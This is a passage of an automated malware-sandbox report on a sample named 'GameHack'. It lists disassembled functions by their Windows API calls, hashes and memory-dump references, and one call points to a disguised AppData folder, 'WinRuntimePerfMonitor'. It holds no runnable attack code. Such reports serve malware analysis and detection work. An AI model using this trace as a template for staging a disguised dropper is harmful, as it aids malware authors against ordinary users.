                                      • Opcode Fuzzy Hash: 182b6382f1844ae3db27580dfd2e7b9413d2bb99cf33905fd174b7d57152fc07
                                      • Instruction Fuzzy Hash: 9AA0029566D5467C710C61526D16D7A425CD4C4B913305919F506B41D155805C45A431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e5f0f7a453d520c114d103361976760ccd9497db8eb4a379d9005c99676ec37f
                                      • Instruction ID: 8ca4586091d0d7428e6630eba5a5c660c90dd814b3addad5715faa6004edd54b
                                      • Opcode Fuzzy Hash: e5f0f7a453d520c114d103361976760ccd9497db8eb4a379d9005c99676ec37f
                                      • Instruction Fuzzy Hash: 9AA0029566D5467C710C61526D16D7A425CD4C4B913305919F506B41D155805C45A431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e4f655b0d84492034e38fd9c5582c5f2cd7e7d546322278026966a6782ffedf2
                                      • Instruction ID: 3d52361a50fd35bbfcca09d2ca52f92ec3a980b65eab4d350f3b239e1f43f3e7
                                      • Opcode Fuzzy Hash: e4f655b0d84492034e38fd9c5582c5f2cd7e7d546322278026966a6782ffedf2
                                      • Instruction Fuzzy Hash: C1A0029537D54B7C710852526D17D76025CD4C4B513316519F506B41C16A505C456431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 9cbf584db84597844e3e5e409797bdb0ecb8006083618660acd0230169e413a4
                                      • Instruction ID: 3d52361a50fd35bbfcca09d2ca52f92ec3a980b65eab4d350f3b239e1f43f3e7
                                      • Opcode Fuzzy Hash: 9cbf584db84597844e3e5e409797bdb0ecb8006083618660acd0230169e413a4
                                      • Instruction Fuzzy Hash: C1A0029537D54B7C710852526D17D76025CD4C4B513316519F506B41C16A505C456431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8584737d83efd80d9de73027a038a8305a7e56161ad8a19d991db8039cbcfeb2
                                      • Instruction ID: 3d52361a50fd35bbfcca09d2ca52f92ec3a980b65eab4d350f3b239e1f43f3e7
                                      • Opcode Fuzzy Hash: 8584737d83efd80d9de73027a038a8305a7e56161ad8a19d991db8039cbcfeb2
                                      • Instruction Fuzzy Hash: C1A0029537D54B7C710852526D17D76025CD4C4B513316519F506B41C16A505C456431
                                      APIs
                                      • SetEndOfFile.KERNELBASE(?,00ED9104,?,?,-00001964), ref: 00ED9EC2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: fa8f84aa66f11296f11c47b750b439804a88686892252f9596164228c243f6cf
                                      • Instruction ID: d3c852118fb3fbe2f664a6675080dbf6b2137d25f2489a00a22b1732678d8c28
                                      • Opcode Fuzzy Hash: fa8f84aa66f11296f11c47b750b439804a88686892252f9596164228c243f6cf
                                      • Instruction Fuzzy Hash: E0B011300A200A8ACE002B30CC088283A28FA2230A30082A0A002CA0A0CB22C002AA00
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?,00EEA587,C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor,00000000,00F1946A,00000006), ref: 00EEA326
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: fe5c77835397e66bb7e2a3b1bc64c9399571c956cef0232ec7c8e3dfe75950db
                                      • Instruction ID: fdab742739d2cff93f027a402ec78ecafa7fcba97c4b35ad1fe20e9e70880226
                                      • Opcode Fuzzy Hash: fe5c77835397e66bb7e2a3b1bc64c9399571c956cef0232ec7c8e3dfe75950db
                                      • Instruction Fuzzy Hash: B1A0123019400A56CA000B30CD09C1576546760702F0086207002C00A0CB308814B500
                                      APIs
                                      • CloseHandle.KERNELBASE(000000FF,?,?,00ED968F,?,?,?,?,00F01FA1,000000FF), ref: 00ED96EB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: b18edf08e5ee7dff4715aaadbb3150f4af67ba74bdee159142b5c1227c6b949d
                                      • Instruction ID: c71090569a7bd30b20b638e15dc8ded042ff8db6c5da259def6e0ddcf1ca74b8
                                      • Opcode Fuzzy Hash: b18edf08e5ee7dff4715aaadbb3150f4af67ba74bdee159142b5c1227c6b949d
                                      • Instruction Fuzzy Hash: B5F05E30556B048FDB308E24D949792B7E8EB12729F04AB1F90F7636E1D761A98E9F00
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00EEB971
                                      • EndDialog.USER32(?,00000006), ref: 00EEB984
                                      • GetDlgItem.USER32(?,0000006C), ref: 00EEB9A0
                                      • SetFocus.USER32(00000000), ref: 00EEB9A7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00EEB9E1
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00EEBA18
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EEBA2E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EEBA4C
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EEBA5C
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00EEBA78
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00EEBA94
                                      • _swprintf.LIBCMT ref: 00EEBAC4
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00EEBAD7
                                      • FindClose.KERNEL32(00000000), ref: 00EEBADE
                                      • _swprintf.LIBCMT ref: 00EEBB37
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00EEBB4A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00EEBB67
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00EEBB87
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EEBB97
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00EEBBB1
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00EEBBC9
                                      • _swprintf.LIBCMT ref: 00EEBBF5
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00EEBC08
                                      • _swprintf.LIBCMT ref: 00EEBC5C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00EEBC6F
                                        • Part of subcall function 00EEA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00EEA662
                                        • Part of subcall function 00EEA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F0E600,?,?), ref: 00EEA6B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                      • API String ID: 797121971-1840816070
                                      • Opcode ID: 7a67513c682efc448aea3a1ee9fb13ee86c6dbd55bbbf434e1c17b3917d7bf1a
                                      • Instruction ID: 75c6b517279e17bd7557fb4bf8eafd1274c7f980a7814d727a0618b54b392f79
                                      • Opcode Fuzzy Hash: 7a67513c682efc448aea3a1ee9fb13ee86c6dbd55bbbf434e1c17b3917d7bf1a
                                      • Instruction Fuzzy Hash: A391C3B214838CBBD6319BA1DD49FFBB7ECEB89704F001819B749E2081DB71A6059762
                                      APIs
                                      • _swprintf.LIBCMT ref: 00EDDABE
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                        • Part of subcall function 00EE1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F10EE8,00000200,00EDD202,00000000,?,00000050,00F10EE8), ref: 00EE15B3
                                      • _strlen.LIBCMT ref: 00EDDADF
                                      • SetDlgItemTextW.USER32(?,00F0E154,?), ref: 00EDDB3F
                                      • GetWindowRect.USER32(?,?), ref: 00EDDB79
                                      • GetClientRect.USER32(?,?), ref: 00EDDB85
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EDDC25
                                      • GetWindowRect.USER32(?,?), ref: 00EDDC52
                                      • SetWindowTextW.USER32(?,?), ref: 00EDDC95
                                      • GetSystemMetrics.USER32(00000008), ref: 00EDDC9D
                                      • GetWindow.USER32(?,00000005), ref: 00EDDCA8
                                      • GetWindowRect.USER32(00000000,?), ref: 00EDDCD5
                                      • GetWindow.USER32(00000000,00000002), ref: 00EDDD47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                      • String ID: $%s:$CAPTION$d
                                      • API String ID: 2407758923-2512411981
                                      • Opcode ID: 13aa109a271271af8e776729d85f654141f141ebad2000c2ae99e2b8f56d3e89
                                      • Instruction ID: 22d86e1d6fb456606f675e4195949bca4765501b6c7098b2fb21ae4a6c9e219c
                                      • Opcode Fuzzy Hash: 13aa109a271271af8e776729d85f654141f141ebad2000c2ae99e2b8f56d3e89
                                      • Instruction Fuzzy Hash: 99819271108305AFD710DF68CD85E6BBBE9EBC9714F04191EFA84E3291D670E90ACB52
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED7191
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00ED72F1
                                      • CloseHandle.KERNEL32(00000000), ref: 00ED7301
                                        • Part of subcall function 00ED7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00ED7C04
                                        • Part of subcall function 00ED7BF5: GetLastError.KERNEL32 ref: 00ED7C4A
                                        • Part of subcall function 00ED7BF5: CloseHandle.KERNEL32(?), ref: 00ED7C59
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00ED730C
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00ED741A
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00ED7446
                                      • CloseHandle.KERNEL32(?), ref: 00ED7457
                                      • GetLastError.KERNEL32 ref: 00ED7467
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00ED74B3
                                      • DeleteFileW.KERNEL32(?), ref: 00ED74DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3935142422-3508440684
                                      • Opcode ID: 618c60e7de090b81ab204a4fd88b82c369c70c0bf26d063b99c5b44951075010
                                      • Instruction ID: 8360fa29b2811c65dfa9879e21e3d2faf324178857778e86c02a0828f1e0e26e
                                      • Opcode Fuzzy Hash: 618c60e7de090b81ab204a4fd88b82c369c70c0bf26d063b99c5b44951075010
                                      • Instruction Fuzzy Hash: DAB1E571904219ABDF21DF60DC41BEE7BB8EF04304F0454AAF955F7282E734AA46CB61
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00EFC277
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE2F
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE41
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE53
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE65
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE77
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE89
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE9B
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBEAD
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBEBF
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBED1
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBEE3
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBEF5
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBF07
                                      • _free.LIBCMT ref: 00EFC26C
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EFC28E
                                      • _free.LIBCMT ref: 00EFC2A3
                                      • _free.LIBCMT ref: 00EFC2AE
                                      • _free.LIBCMT ref: 00EFC2D0
                                      • _free.LIBCMT ref: 00EFC2E3
                                      • _free.LIBCMT ref: 00EFC2F1
                                      • _free.LIBCMT ref: 00EFC2FC
                                      • _free.LIBCMT ref: 00EFC334
                                      • _free.LIBCMT ref: 00EFC33B
                                      • _free.LIBCMT ref: 00EFC358
                                      • _free.LIBCMT ref: 00EFC370
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: e608033bef98b2edc3e3548c579284d88c774a28e2038594897f97eef90d809b
                                      • Instruction ID: 6f0add214c03846413d9919326089a97483b63781a4729522841a65842a7f254
                                      • Opcode Fuzzy Hash: e608033bef98b2edc3e3548c579284d88c774a28e2038594897f97eef90d809b
                                      • Instruction Fuzzy Hash: B8316F3260060D9FEB20AE78DA45B7673E9FF00354F34A469E659E7561DF31AC40DB50
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00EECD51
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00EECD7D
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EECD99
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00EECDB0
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00EECDC4
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00EECDED
                                      • DeleteObject.GDI32(00000000), ref: 00EECDF4
                                      • GetWindow.USER32(00000000,00000002), ref: 00EECDFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                      • String ID: STATIC
                                      • API String ID: 3820355801-1882779555
                                      • Opcode ID: bbda76716b9a07428e62fba9b8488b3a3cbd482fc0927dd8497c5ba8a3fcda92
                                      • Instruction ID: 4d1599c06a39c65bcc560b20fd460efce6d7891533df51fc45a952de9522403e
                                      • Opcode Fuzzy Hash: bbda76716b9a07428e62fba9b8488b3a3cbd482fc0927dd8497c5ba8a3fcda92
                                      • Instruction Fuzzy Hash: DE113A7214039CBBE3206B219C49FAF369DFF45755F105020FB46B10E2CA708D16A6A1
                                      APIs
                                      • _free.LIBCMT ref: 00EF8EC5
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EF8ED1
                                      • _free.LIBCMT ref: 00EF8EDC
                                      • _free.LIBCMT ref: 00EF8EE7
                                      • _free.LIBCMT ref: 00EF8EF2
                                      • _free.LIBCMT ref: 00EF8EFD
                                      • _free.LIBCMT ref: 00EF8F08
                                      • _free.LIBCMT ref: 00EF8F13
                                      • _free.LIBCMT ref: 00EF8F1E
                                      • _free.LIBCMT ref: 00EF8F2C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
